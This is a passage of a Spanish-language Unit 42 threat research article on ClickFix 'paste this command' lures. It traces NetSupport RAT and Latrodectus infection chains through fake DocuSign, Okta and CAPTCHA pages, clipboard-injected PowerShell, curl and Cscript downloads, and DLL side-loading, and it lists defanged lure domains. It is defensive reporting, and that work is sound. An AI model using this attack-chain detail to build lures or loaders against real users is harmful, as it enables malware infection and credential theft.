{"id":157571,"date":"2025-07-10T07:58:52","date_gmt":"2025-07-10T14:58:52","guid":{"rendered":"https:\/\/unit42.paloaltonetworks.com\/?p=157571"},"modified":"2025-09-17T11:28:26","modified_gmt":"2025-09-17T18:28:26","slug":"preventing-clickfix-attack-vector","status":"publish","type":"post","link":"https:\/\/unit42.paloaltonetworks.com\/es-la\/preventing-clickfix-attack-vector\/","title":{"rendered":"Arregla el clic: Prevenci\u00f3n del vector de ataque ClickFix"},"content":{"rendered":"<h2><a id=\"post-157571-_4lt92rr5muov\"><\/a>Resumen ejecutivo<\/h2>\n<p>En este art\u00edculo, compartimos consejos de caza y estrategias de mitigaci\u00f3n para las campa\u00f1as de ClickFix y ofrecemos una visi\u00f3n interna de algunas de las campa\u00f1as de ClickFix m\u00e1s destacadas que hemos visto hasta ahora en 2025:<\/p>\n<ul>\n<li>Los atacantes que distribuyen el troyano de acceso remoto (RAT) NetSupport est\u00e1n intensificando sus actividades con un nuevo cargador<\/li>\n<li>Los atacantes que distribuyen el malware Latrodectus est\u00e1n atrayendo a las v\u00edctimas con una nueva campa\u00f1a ClickFix<\/li>\n<li>Prol\u00edfica campa\u00f1a de Lumma Stealer dirigida a varios sectores con nuevas t\u00e9cnicas<\/li>\n<\/ul>\n<p>ClickFix es una t\u00e9cnica cada vez m\u00e1s popular que los actores de amenazas utilizan en se\u00f1uelos de ingenier\u00eda social. Con esta t\u00e9cnica se enga\u00f1a a las v\u00edctimas potenciales para que ejecuten comandos maliciosos, con la excusa de llevar a cabo \u201csoluciones r\u00e1pidas\u201d para problemas inform\u00e1ticos comunes.<\/p>\n<p>Estas campa\u00f1as utilizan la reputaci\u00f3n de productos y servicios leg\u00edtimos para ocultar sus actividades de forma que resulte m\u00e1s dif\u00edcil descubrirlas. Esto no implica que el autor del archivo ejecutable sea culpable o responsable del resultado causado por el malware.<\/p>\n<p>Las campa\u00f1as de ClickFix han repercutido en organizaciones de muy diversos sectores, entre ellos los siguientes:<\/p>\n<ul>\n<li>Tecnolog\u00eda avanzada<\/li>\n<li>Servicios financieros<\/li>\n<li>Manufactura<\/li>\n<li>Comercio mayorista y minorista<\/li>\n<li>Gobierno estatal y local<\/li>\n<li>Servicios profesionales y legales<\/li>\n<li>Servicios p\u00fablicos y energ\u00eda<\/li>\n<\/ul>\n<p>Unit\u00a042 ha ayudado recientemente en casi una docena de casos de respuesta a incidentes en los que un se\u00f1uelo de ClickFix fue el vector de acceso inicial.<\/p>\n<p>Un se\u00f1uelo ClickFix eficaz podr\u00eda permitir a los actores de amenazas llevar a cabo una toma de control completa de la organizaci\u00f3n objetivo. Estos se\u00f1uelos pueden ser bastante sencillos de preparar para los actores de amenazas, dejando a las organizaciones susceptibles de recopilaci\u00f3n de credenciales, robo de correo e incluso incidentes de ransomware.<\/p>\n<p>Identificamos dos variantes de esta t\u00e9cnica:<\/p>\n<ul>\n<li>Ordenar a un objetivo que ejecute comandos maliciosos en la ventana Ejecutar mediante la tecla de Windows + R (<span style=\"font-family: 'courier new', courier, monospace;\">Win+R<\/span>)<\/li>\n<li>Ordenar a una v\u00edctima potencial que ejecute comandos maliciosos en una ventana de terminal mediante la tecla de Windows + X (<span style=\"font-family: 'courier new', courier, monospace;\">Win+X<\/span>).<\/li>\n<\/ul>\n<p>Los clientes de Palo Alto Networks est\u00e1n mejor protegidos frente a las amenazas aqu\u00ed descritas gracias a los siguientes productos y servicios:<\/p>\n<ul>\n<li><a href=\"https:\/\/www.paloaltonetworks.com\/network-security\/advanced-wildfire\" target=\"_blank\" rel=\"noopener\">WildFire avanzado<\/a><\/li>\n<li><a href=\"https:\/\/www.paloaltonetworks.com\/network-security\/advanced-url-filtering\" target=\"_blank\" rel=\"noopener\">URL Filtering avanzado<\/a> y <a href=\"https:\/\/www.paloaltonetworks.com\/network-security\/advanced-dns-security\" target=\"_blank\" rel=\"noopener\">Seguridad DNS avanzada<\/a><\/li>\n<li><a href=\"https:\/\/docs-cortex.paloaltonetworks.com\/p\/XDR\" target=\"_blank\" rel=\"noopener\">Cortex XDR<\/a> y <a href=\"https:\/\/docs-cortex.paloaltonetworks.com\/p\/XSIAM\" target=\"_blank\" rel=\"noopener\">XSIAM<\/a><\/li>\n<\/ul>\n<p>Si cree que puede haber resultado vulnerado o tiene un problema urgente, p\u00f3ngase en contacto con el <a href=\"https:\/\/start.paloaltonetworks.com\/contact-unit42.html\" target=\"_blank\" rel=\"noopener\">equipo de respuesta ante incidentes de Unit\u00a042<\/a>.<\/p>\n<table style=\"width: 100.447%;\">\n<thead>\n<tr>\n<td style=\"width: 35%;\"><b>Temas relacionados con Unit\u00a042<\/b><\/td>\n<td style=\"width: 205.829%;\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/es-la\/tag\/social-engineering-es-la\/\" target=\"_blank\" rel=\"noopener\"><b>Social Engineering<\/b><\/a>, <strong><a href=\"https:\/\/unit42.paloaltonetworks.com\/es-la\/category\/threat-research-es-la\/malware-es-la\/\" target=\"_blank\" rel=\"noopener\">Malware<\/a><\/strong>,<a href=\"https:\/\/unit42.paloaltonetworks.com\/es-la\/tag\/malvertising-es-la\/\" target=\"_blank\" rel=\"noopener\"><strong> Malvertising<\/strong><\/a><\/td>\n<\/tr>\n<\/thead>\n<\/table>\n<h2><a id=\"post-157571-_jxasuugwj3gk\"><\/a>Disecci\u00f3n de la t\u00e9cnica ClickFix<\/h2>\n<p>Antes de examinar la t\u00e9cnica ClickFix, debemos entender mejor qu\u00e9 es ClickFix y hasta qu\u00e9 punto se ha extendido en los \u00faltimos meses.<\/p>\n<p>ClickFix es una t\u00e9cnica de ingenier\u00eda social relativamente nueva que los actores de amenazas utilizan cada vez m\u00e1s en las campa\u00f1as de ataque. Con esta t\u00e9cnica se enga\u00f1a a los usuarios objetivo para que apliquen \u201csoluciones r\u00e1pidas\u201d a problemas inform\u00e1ticos comunes, como problemas de rendimiento, controladores que faltan o errores emergentes. En los \u00faltimos meses, muchos de los se\u00f1uelos que utilizan la t\u00e9cnica ClickFix han sido falsas p\u00e1ginas de verificaci\u00f3n en las que se pide a las v\u00edctimas que completen una acci\u00f3n antes de continuar supuestamente hacia el destino previsto por el usuario.<\/p>\n<p>Los actores de amenazas suelen lanzar estos se\u00f1uelos a trav\u00e9s de:<\/p>\n<ul>\n<li>Sitios web leg\u00edtimos pero comprometidos<\/li>\n<li>Publicidad malintencionada<\/li>\n<li>Tutoriales en YouTube<\/li>\n<li>Falsos foros de asistencia t\u00e9cnica<\/li>\n<\/ul>\n<p>La t\u00e9cnica ClickFix se basa en <a href=\"https:\/\/www.malwarebytes.com\/blog\/news\/2025\/03\/fake-captcha-websites-hijack-your-clipboard-to-install-information-stealers\" target=\"_blank\" rel=\"noopener\">secuestro del portapapeles<\/a>. Las p\u00e1ginas web que utilizan ClickFix inyectan scripts o comandos maliciosos en el portapapeles de la v\u00edctima potencial y proporcionan instrucciones para pegar y ejecutar el contenido malicioso. Como la t\u00e9cnica ClickFix pide a los usuarios que peguen el contenido, a veces se denomina \u201cpastejacking\u201d.<\/p>\n<p>Los atacantes utilizan la t\u00e9cnica ClickFix como vector de infecci\u00f3n inicial y las cargas \u00fatiles que le siguen var\u00edan: algunos se\u00f1uelos dejan caer infostealers, otros implementan RAT o desactivan herramientas de seguridad. Pero todos se basan en convencer a la v\u00edctima para que haga el trabajo del atacante por ellos: ejecutar el c\u00f3digo manualmente.<\/p>\n<p>Este m\u00e9todo de entrega elude muchos controles est\u00e1ndar de detecci\u00f3n y prevenci\u00f3n. No hay ning\u00fan exploit, adjunto de phishing o enlace malicioso. En su lugar, las v\u00edctimas potenciales ejecutan ellas mismas el comando sin saberlo, a trav\u00e9s de un shell de confianza del sistema.<\/p>\n<p>Este m\u00e9todo hace que las infecciones de ClickFix sean m\u00e1s dif\u00edciles de detectar que las descargas no autorizadas o los programas maliciosos tradicionales. Sin embargo, los investigadores a\u00fan pueden buscar artefactos para detectar estas infecciones.<\/p>\n<h3><a id=\"post-157571-_svcwnqupd58w\"><\/a>El auge de un fen\u00f3meno mundial<\/h3>\n<p>Hemos estado vigilando de cerca los se\u00f1uelos de ClickFix en los \u00faltimos meses y hemos encontrado decenas de variantes que ofrecen varias familias de malware. En la Figura\u00a01 se muestra la distribuci\u00f3n de casos por semana.<\/p>\n<figure id=\"attachment_157572\" aria-describedby=\"caption-attachment-157572\" style=\"width: 800px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-157572 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/chart-3.png\" alt=\"Gr\u00e1fico de barras en el que se muestra el recuento de eventos por semana, desde la semana que comienza el 30 de diciembre de 2024 hasta el 12 de mayo de 2025. El recuento de eventos var\u00eda entre un m\u00ednimo de 1 y un m\u00e1ximo de 126. Se observan picos importantes en la semana que comienza el 27 de enero de 2025, con 121 eventos, y el 24 de marzo de 2025, con 126 eventos.\" width=\"800\" height=\"425\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/chart-3.png 1396w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/chart-3-786x418.png 786w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/chart-3-1317x700.png 1317w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/chart-3-768x408.png 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><figcaption id=\"caption-attachment-157572\" class=\"wp-caption-text\">Figura 1. Casos semanales de infecci\u00f3n desde principios de 2025.<\/figcaption><\/figure>\n<p>Nuestros investigadores tambi\u00e9n observaron el impacto de ClickFix en una amplia variedad de sectores empresariales, como se muestra en la Figura\u00a02.<\/p>\n<figure id=\"attachment_157583\" aria-describedby=\"caption-attachment-157583\" style=\"width: 800px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-157583 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-156218-157571-2.png\" alt=\"Gr\u00e1fico de barras en el que se muestra el recuento de entidades por industria. Las industrias representadas de mayor a menor recuento son: Tecnolog\u00eda avanzada, servicios financieros, manufactura, comercio mayorista y minorista, administraci\u00f3n estatal y local, servicios profesionales y jur\u00eddicos, servicios p\u00fablicos y energ\u00eda, farmacia y ciencias biol\u00f3gicas, hoteler\u00eda, telecomunicaciones, atenci\u00f3n de salud, gobierno federal y educaci\u00f3n. Bloqueo del logotipo de Palo Alto Networks y Unit\u00a042.\" width=\"800\" height=\"686\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-156218-157571-2.png 2048w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-156218-157571-2-513x440.png 513w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-156218-157571-2-817x700.png 817w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-156218-157571-2-768x658.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-156218-157571-2-1536x1316.png 1536w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><figcaption id=\"caption-attachment-157583\" class=\"wp-caption-text\">Figura 2. Distribuci\u00f3n de las industrias afectadas por los se\u00f1uelos de ClickFix.<\/figcaption><\/figure>\n<h2><a id=\"post-157571-_fs62q378nei0\"><\/a>Estudios de casos<\/h2>\n<p>Tres de las campa\u00f1as m\u00e1s destacadas que hemos observado hasta ahora en 2025 muestran c\u00f3mo los actores de amenazas han integrado ClickFix en el flujo de ataque de varias familias de malware.<\/p>\n<h3><a id=\"post-157571-_9v19yzs0508c\"><\/a>NetSupport RAT cambia su carga<\/h3>\n<p>Durante la b\u00fasqueda de actividades relacionadas con ClickFix, identificamos una campa\u00f1a especialmente prol\u00edfica que estuvo activa en mayo de 2025. En esta campa\u00f1a, los atacantes que utilizaban NetSupport RAT afectaron a varias industrias, entre ellas las siguientes:<\/p>\n<ul>\n<li>Atenci\u00f3n de salud<\/li>\n<li>Servicios jur\u00eddicos<\/li>\n<li>Telecomunicaciones<\/li>\n<li>Venta minorista<\/li>\n<li>Miner\u00eda<\/li>\n<\/ul>\n<p>Esta campa\u00f1a de ClickFix que distribuye NetSupport RAT aprovecha los dominios de distribuci\u00f3n que se hacen pasar por servicios leg\u00edtimos y populares:<\/p>\n<ul>\n<li>DocuSign: una plataforma digital para firmar, enviar y gestionar documentos electr\u00f3nicamente.<\/li>\n<li>Okta: una plataforma que ayuda a las empresas a gestionar y proteger el acceso de los usuarios a aplicaciones y sistemas. Proporciona servicios de registro \u00fanico (SSO), autenticaci\u00f3n multifactor y gesti\u00f3n de identidades.<\/li>\n<\/ul>\n<p>Los actores de amenazas con frecuencia abusan, se aprovechan o subvierten productos leg\u00edtimos con fines maliciosos. Esto no implica que el producto leg\u00edtimo sea defectuoso o malicioso.<\/p>\n<p>En las Figuras\u00a03\u00a0y\u00a04 se muestran las p\u00e1ginas de destino falsas de DocuSign y Okta:<\/p>\n<p><figure id=\"attachment_157594\" aria-describedby=\"caption-attachment-157594\" style=\"width: 800px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-157594 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-159874-157571-3.png\" alt=\"P\u00e1gina de aterrizaje falsa para PandaDoc, en la que se habla de la alternativa de firma de documentos, se destaca la facilidad y la rentabilidad, con varios distintivos del sector y logotipos de marcas de confianza.\" width=\"800\" height=\"511\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-159874-157571-3.png 1308w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-159874-157571-3-689x440.png 689w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-159874-157571-3-1097x700.png 1097w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-159874-157571-3-768x490.png 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><figcaption id=\"caption-attachment-157594\" class=\"wp-caption-text\">Figura 3. P\u00e1gina de aterrizaje falsa para DocuSign en <span style=\"font-family: 'courier new', courier, monospace;\">docusign.sa[.]com<\/span>.<\/figcaption><\/figure><figure id=\"attachment_157605\" aria-describedby=\"caption-attachment-157605\" style=\"width: 700px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-157605 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-162891-157571-4.png\" alt=\"Captura de pantalla de una p\u00e1gina de verificaci\u00f3n de seguridad falsa en la que aparece una casilla de verificaci\u00f3n llamada &quot;Verify you are human&quot; (Verifique que es humano) con el logotipo de Cloudflare debajo. En el texto se explica que el sitio necesita revisar la seguridad de la conexi\u00f3n antes de continuar.\" width=\"700\" height=\"387\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-162891-157571-4.png 1141w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-162891-157571-4-786x435.png 786w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-162891-157571-4-768x425.png 768w\" sizes=\"(max-width: 700px) 100vw, 700px\" \/><figcaption id=\"caption-attachment-157605\" class=\"wp-caption-text\">Figura 4. P\u00e1gina de destino falsa para Okta en <span style=\"font-family: 'courier new', courier, monospace;\">oktacheck.it[.]com.<\/span><\/figcaption><\/figure>Sospechamos que esta campa\u00f1a de ClickFix distribuye NetSupport RAT a trav\u00e9s de la infraestructura de <a href=\"https:\/\/reliaquest.com\/blog\/new-execution-technique-in-clearfake-campaign\/\" target=\"_blank\" rel=\"noopener\">ClearFake<\/a>. Nuestra sospecha se basa en las similitudes entre el se\u00f1uelo de ClickFix y la infraestructura de ClearFake. Ambos contienen los mismos comentarios en ruso y utilizan una funcionalidad id\u00e9ntica de inyecci\u00f3n en el portapapeles de JavaScript.<\/p>\n<p>ClearFake es un marco JavaScript malicioso que se implementa en sitios web comprometidos como parte de campa\u00f1as de descargas no solicitadas utilizadas por otras cepas de malware. En la Figura\u00a05 se muestra a ClearFake inyectando un comando PowerShell codificado mediante la funci\u00f3n JavaScript <span style=\"font-family: 'courier new', courier, monospace;\">unsecuredCopyToClipboard<\/span>. En la figura tambi\u00e9n aparecen comentarios en ruso dentro del c\u00f3digo, lo que nos da pistas sobre los or\u00edgenes del desarrollador de ClearFake.<\/p>\n<figure id=\"attachment_157616\" aria-describedby=\"caption-attachment-157616\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-157616 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-165593-157571-5.png\" alt=\"Una captura de pantalla dividida en dos secciones en las que se muestran los pasos de verificaci\u00f3n a la izquierda y el c\u00f3digo inform\u00e1tico a la derecha. A la izquierda, una interfaz naranja le indica al usuario que complete los pasos de verificaci\u00f3n, como mantener pulsada la tecla de Windows y R, y verificar con Intro. Este es el primer paso. A la derecha, una interfaz de codificaci\u00f3n con l\u00edneas de c\u00f3digo en colores rojo y negro, notas en ruso, que indican modificaciones de un comando PowerShell. El segundo paso es el comando PowerShell ofuscado que se inyecta en el teclado del usuario. \" width=\"1000\" height=\"394\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-165593-157571-5.png 2048w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-165593-157571-5-786x309.png 786w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-165593-157571-5-1779x700.png 1779w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-165593-157571-5-768x302.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-165593-157571-5-1536x605.png 1536w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-157616\" class=\"wp-caption-text\">Figura 5. P\u00e1gina de destino e inyecci\u00f3n de scripts en una p\u00e1gina falsa de DocuSign.<\/figcaption><\/figure>\n<p>En la ventana de verificaci\u00f3n falsa se muestran instrucciones para abrir el cuadro de di\u00e1logo Ejecutar y, a continuaci\u00f3n, pegar en \u00e9l el contenido del portapapeles; la interfaz presenta estas instrucciones como una prueba para demostrar que el usuario es humano. La v\u00edctima puede no ser consciente del comando PowerShell malicioso que el sitio web inyecta posteriormente (como se ha mencionado anteriormente, este es un ejemplo de <a href=\"https:\/\/github.com\/dxa4481\/Pastejacking\" target=\"_blank\" rel=\"noopener\">pastejacking<\/a>).<\/p>\n<p>Una vez ejecutado, el comando descarga otro script PowerShell que descarga y ejecuta la siguiente fase del ataque. La cadena de infecci\u00f3n se representa en la Figura\u00a06.<\/p>\n<figure id=\"attachment_157765\" aria-describedby=\"caption-attachment-157765\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-157765 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/Es-LA_NetSupportRAT-Infection-Chain-676x440.png\" alt=\"Diagrama de flujo en el que se ilustra un ciberataque en el que se utilizan mensajes falsos del sitio web de Okta, la ejecuci\u00f3n de Cmd.exe y PowerShell para descargar y ejecutar software malicioso, incluida la RAT NetSupport y varios archivos ejecutables, lo que conduce a la inyecci\u00f3n y extracci\u00f3n de datos.\" width=\"1000\" height=\"651\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/Es-LA_NetSupportRAT-Infection-Chain-676x440.png 676w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/Es-LA_NetSupportRAT-Infection-Chain-1076x700.png 1076w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/Es-LA_NetSupportRAT-Infection-Chain-768x500.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/Es-LA_NetSupportRAT-Infection-Chain-1536x1000.png 1536w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/07\/Es-LA_NetSupportRAT-Infection-Chain-2048x1333.png 2048w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-157765\" class=\"wp-caption-text\">Figura 6. La cadena de infecci\u00f3n de NetSupport RAT.<\/figcaption><\/figure>\n<p>La siguiente etapa est\u00e1 dentro de un archivo ZIP, que incluye todas las dependencias leg\u00edtimas necesarias para ejecutar <span style=\"font-family: 'courier new', courier, monospace;\">jp2launcher.exe<\/span>. Este archivo es un componente leg\u00edtimo de Java Runtime Environment (JRE) utilizado para lanzar aplicaciones Java, como se muestra en la Figura\u00a07.<\/p>\n<figure id=\"attachment_157638\" aria-describedby=\"caption-attachment-157638\" style=\"width: 618px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-157638 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-172658-157571-7.png\" alt=\"Captura de pantalla de una computadora en la que se muestra una lista de archivos relacionados principalmente con componentes y aplicaciones de Microsoft Windows. En cada entrada de archivo se muestra el nombre del archivo, la fecha de modificaci\u00f3n, el tipo y el tama\u00f1o. Tres filas se resaltan en un recuadro rojo.\" width=\"618\" height=\"352\" \/><figcaption id=\"caption-attachment-157638\" class=\"wp-caption-text\">Figura 7. Contenido del archivo ZIP descargado por <span style=\"font-family: 'courier new', courier, monospace;\">cmd.exe<\/span>.<\/figcaption><\/figure>\n<p>En primer lugar, cmd.exe descarga el archivo ZIP, extrae su contenido y lo guarda en el directorio <span style=\"font-family: 'courier new', courier, monospace;\">%APPDATA%\/Local\/Temp\/ directory<\/span>. A continuaci\u00f3n, <span style=\"font-family: 'courier new', courier, monospace;\">cmd.exe<\/span> ejecuta <span style=\"font-family: 'courier new', courier, monospace;\">jp2launcher.exe<\/span>, que carga un cargador malicioso llamado <span style=\"font-family: 'courier new', courier, monospace;\">msvcp140.dll<\/span>. El <a href=\"#post-157571-_zctlzocvrsya\" target=\"_blank\" rel=\"noopener\">Ap\u00e9ndice<\/a> de este art\u00edculo proporciona un an\u00e1lisis t\u00e9cnico completo del nuevo cargador NetSupport RAT basado en DLL.<\/p>\n<p>Por \u00faltimo, la DLL descarga y ejecuta un archivo ZIP que contiene NetSupport RAT (<span style=\"font-family: 'courier new', courier, monospace;\">client32.exe<\/span>) y los archivos asociados. NetSupport RAT es un software leg\u00edtimo, pero las copias desactualizadas o robadas suelen utilizarse indebidamente por <a href=\"https:\/\/blogs.vmware.com\/security\/2023\/11\/netsupport-rat-the-rat-king-returns.html\" target=\"_blank\" rel=\"noopener\">diferentes actores de amenazas<\/a>, normalmente configuradas como RAT para la infiltraci\u00f3n e infecci\u00f3n de endpoints.<\/p>\n<h3><a id=\"post-157571-_etm6iq3d8nbl\"><\/a>Latrodectus lanza nuevos se\u00f1uelos ClickFix<\/h3>\n<p>Durante marzo-abril de 2025, observamos un aumento del tr\u00e1fico hacia dominios controlados por Latrodectus. Tambi\u00e9n observamos un cambio en la estrategia de infecci\u00f3n, ya que los atacantes que distribu\u00edan Latrodectus empezaron a utilizar la t\u00e9cnica ClickFix en sus vectores de acceso iniciales.<\/p>\n<p>Esta cadena de ataques Latrodectus comienza cuando una persona visita un sitio web leg\u00edtimo, pero comprometido. A continuaci\u00f3n, la infraestructura ClearFake redirige al usuario del sitio a una p\u00e1gina de verificaci\u00f3n falsa. En esta p\u00e1gina se presenta un mensaje que indica al usuario que ejecute un comando a trav\u00e9s del cuadro de di\u00e1logo Ejecutar, mientras que el backend JavaScript malicioso inyecta un comando PowerShell en el portapapeles del endpoint.<\/p>\n<p>En la Figura\u00a08 se muestra el se\u00f1uelo y la cadena de redireccionamiento posterior desde el sitio comprometido.<\/p>\n<figure id=\"attachment_157649\" aria-describedby=\"caption-attachment-157649\" style=\"width: 800px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-157649 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-175418-157571-8.png\" alt=\"Captura de pantalla de una computadora en la que se muestra una p\u00e1gina de verificaci\u00f3n captcha que indica al usuario que complete los pasos mediante atajos de teclado. En la pantalla tambi\u00e9n se muestran herramientas de desarrollo web abiertas en el navegador con varios nombres de script visibles.\" width=\"800\" height=\"461\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-175418-157571-8.png 1831w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-175418-157571-8-764x440.png 764w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-175418-157571-8-1216x700.png 1216w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-175418-157571-8-768x442.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-175418-157571-8-1536x884.png 1536w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><figcaption id=\"caption-attachment-157649\" class=\"wp-caption-text\">Figura\u00a08. Se\u00f1uelo Latrodectus ClickFix.<\/figcaption><\/figure>\n<p>Cuando las v\u00edctimas pegan y ejecutan el comando inyectado, no ven el comando en s\u00ed. Lo que s\u00ed ven es el comentario final al final del script (<span style=\"font-family: 'courier new', courier, monospace;\">Cloud Identificator: 2031<\/span>), que parece parte de un proceso de autenticaci\u00f3n normal. Sin embargo, al ejecutarse, el script utiliza <span style=\"font-family: 'courier new', courier, monospace;\">curl.exe<\/span> para descargar un archivo JavaScript de un servidor de mando y control (C2). A continuaci\u00f3n, ejecuta el archivo mediante Cscript, como se muestra en la Figura\u00a09.<\/p>\n<figure id=\"attachment_157660\" aria-describedby=\"caption-attachment-157660\" style=\"width: 832px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-157660 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-180086-157571-9.png\" alt=\"Fragmento de c\u00f3digo con resaltado de sintaxis en modo oscuro, con algunas redacciones por privacidad.\" width=\"832\" height=\"68\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-180086-157571-9.png 832w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-180086-157571-9-786x64.png 786w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-180086-157571-9-768x63.png 768w\" sizes=\"(max-width: 832px) 100vw, 832px\" \/><figcaption id=\"caption-attachment-157660\" class=\"wp-caption-text\">Figura 9. Un comando malicioso inyectado desde un se\u00f1uelo ClickFix en el portapapeles del objetivo.<\/figcaption><\/figure>\n<p>Desde su aparici\u00f3n a mediados de 2024, los atacantes suelen distribuir Latrodectus a trav\u00e9s de una cadena que incluye un archivo JavaScript malicioso que descarga un archivo Microsoft Software Installer (MSI) que deja caer Latrodectus. En este caso, el archivo JavaScript ejecutado (<span style=\"font-family: 'courier new', courier, monospace;\">la.txt<\/span>) recupera un archivo MSI de un servidor remoto y lo ejecuta con <span style=\"font-family: 'courier new', courier, monospace;\">msiexec.exe<\/span>.<\/p>\n<p>A diferencia de campa\u00f1as anteriores, en las que el descargador JavaScript sol\u00eda estar saturado y ofuscado con comentarios sin sentido, esta variante emplea grandes variables JSON basura que tienen nombres aparentemente leg\u00edtimos, como <span style=\"font-family: 'courier new', courier, monospace;\">var_Apple_Palantir38<\/span> y <span style=\"font-family: 'courier new', courier, monospace;\">func_Slack_encryption84<\/span>. En la Figura\u00a010 se muestra una comparaci\u00f3n de las t\u00e9cnicas de ofuscaci\u00f3n utilizadas en campa\u00f1as anteriores y recientes de Latrodectus.<\/p>\n<figure id=\"attachment_157671\" aria-describedby=\"caption-attachment-157671\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-157671 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-182702-157571-10.png\" alt=\"Dos im\u00e1genes paralelas en las que se muestran scripts de codificaci\u00f3n: la de la izquierda representa un fragmento de c\u00f3digo con variables y funciones, mientras que la de la derecha incluye un bloque de c\u00f3digo con un bucle y sentencias condicionales.\" width=\"1000\" height=\"442\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-182702-157571-10.png 2048w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-182702-157571-10-786x347.png 786w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-182702-157571-10-1584x700.png 1584w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-182702-157571-10-768x339.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-182702-157571-10-1536x679.png 1536w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-157671\" class=\"wp-caption-text\">Figura 10. Comparaci\u00f3n entre t\u00e9cnicas de ofuscaci\u00f3n recientes (izquierda) y antiguas (derecha) utilizadas en los cuentagotas Latrodectus.<\/figcaption><\/figure>\n<p>La carga \u00fatil MSI deposita varios archivos en el disco de la v\u00edctima. Estos incluyen <a 